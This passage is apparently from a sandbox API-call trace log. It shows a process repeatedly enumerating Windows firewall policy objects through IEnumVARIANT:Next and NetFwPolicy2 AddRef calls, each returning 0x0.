This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.449] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.450] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.450] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.450] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.451] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.451] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.451] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.452] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.452] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.452] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.453] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.453] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.453] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.454] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.454] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.454] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.454] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.455] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.455] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.455] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.456] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.456] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.456] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.457] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.457] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.457] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.458] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.458] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.458] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.459] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.459] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.459] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.460] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.460] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.460] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.461] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.461] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.461] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.461] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.462] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.462] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.462] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.463] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.463] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.463] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.464] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.464] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.464] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.465] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.465] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.465] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.466] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.466] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.466] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.467] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.467] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.467] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.468] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.468] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.468] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.468] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.469] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.469] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.470] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.470] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.470] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.470] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.471] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.471] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.471] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.472] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.472] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.472] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.473] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.473] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.473] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.473] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.474] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.474] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.474] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.475] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.475] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.475] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.476] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.476] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.476] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.476] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.477] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.477] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.477] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.478] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.478] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.478] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.479] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.479] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.479] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.480] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.609] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.609] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.610] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.610] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.610] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.611] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.611] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.611] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.612] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.612] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.612] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.612] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.613] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.613] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.614] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.614] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.614] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.614] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.615] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.615] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.615] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.616] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.616] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.616] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.617] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.617] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.617] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.618] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.618] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.618] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.619] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.619] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.619] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.619] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.620] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.620] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.621] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.621] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.621] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.621] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.622] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.622] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.622] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.623] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.623] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.623] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.624] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.624] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.624] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.625] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.625] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.625] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.626] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.626] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.626] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.626] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.627] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.627] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.628] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.628] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.628] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.628] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.629] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.629] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.629] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.630] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.630] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.630] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.631] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, 